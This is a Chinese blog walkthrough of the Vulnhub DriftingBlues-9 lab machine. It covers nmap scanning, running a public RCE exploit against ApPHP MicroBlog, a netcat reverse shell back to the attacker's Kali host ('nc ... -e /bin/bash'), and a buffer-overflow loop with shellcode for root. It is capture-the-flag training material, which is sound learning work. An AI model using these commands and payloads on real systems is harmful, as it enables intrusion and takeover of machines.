码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9


    Vulnhub靶机DriftingBlues-9渗透测试详解

      • Vulnhub靶机介绍:
      • Vulnhub靶机下载:
      • Vulnhub靶机漏洞详解:
          • ①:信息收集:
          • ②:漏洞利用:
          • ③:反弹shell:
          • ④:缓冲区溢出提权:
          • ⑤:获取flag:
      • Vulnhub靶机渗透总结:

    Vulnhub靶机介绍:

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

    这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。

    Vulnhub靶机下载:

    官网地址:https://www.vulnhub.com/entry/driftingblues-9-final,695/
    在这里插入图片描述
    在这里插入图片描述
    下载好了把安装包解压 然后试用VMware即可。

    Vulnhub靶机漏洞详解:

    ①:信息收集:

    kali里使用netdiscover发现主机
    在这里插入图片描述
    渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.145

    使用命令:nmap -sS -A -T4 -n 192.168.205.145

    在这里插入图片描述
    开启了80端口和111端口 老样子先访问80端口 直接查看源代码 发现了ApPHP MicroBlog 版本 为 v.1.0.1(第一次遇到)
    在这里插入图片描述
    在这里插入图片描述

    ②:漏洞利用:

    使用searchsploit 搜索相关漏洞 第二个就可以利用

    在这里插入图片描述
    使用命令将利用的脚本复制到本地:searchsploit -m php/webapps/33070.py

    使用python2 执行脚本:python2 ./33070.py http://192.168.205.145
    在这里插入图片描述

    发现了数据库信息 里面有账号和密码 分别是:clapton/yaraklitepe

    使用命令:ls /home 发现和数据用户一样 也可以 cat /etc/passwd 查看是否有nc: whish nc
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    ③:反弹shell:

    在 kali 开启 nc 监听:nc -lvp 6666

    在shell 执行:nc 192.168.205.133 6666 -e /bin/bash

    使用命令交互shell:python -c 'import pty;pty.spawn("/bin/bash")'

    在这里插入图片描述
    尝试切换用户 :clapton / yaraklitepe 获取到了第一个flag

    在这里插入图片描述

    ④:缓冲区溢出提权:

    这里给的提示 缓冲区才是解决方法(什么缓冲区!!!第一次遇到不会pwn)
    在这里插入图片描述

    for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x10\x0c\x97\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
    
    • 1

    具体参考:https://www.ngui.cc/article/show-373956.html
    https://blog.csdn.net/qq_32261191/article/details/117908644

    ⑤:获取flag:

    在这里插入图片描述

    至此获取到了所有得flag,渗透测试结束。

    Vulnhub靶机渗透总结:

    ①:searchsploit 工具的用法
    ②:RCE 漏洞利用
    ③:缓冲区溢出提权(因为没基础所以还不怎么会 后续在学)

    这也是DriftingBlues系列最后一个靶机的学习啦,希望大家也可以学习到新的一些知识点和一些渗透测试思路
    最后创作不易 希望对大家有所帮助!!

  • 相关阅读:
    二建Day08 混凝土 和易性,强度,外加剂
    药品销售数据查询的网站都有哪些?< 市场竞争调研>
    【JVM技术专题】让你完全攻克内存溢出(OOM)这一难题「案例篇」
    SpringBoot 可以同时处理多少请求
    个人记账本,教你使用图表格查看项目
    TrueTouch学习记录
    验证二叉搜索树的后序遍历序列
    四、npm与包
    某大厂高级测试岗位面试题...
    Spring Boot RESTful API
  • 原文地址:https://blog.csdn.net/Aluxian_/article/details/125356565
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号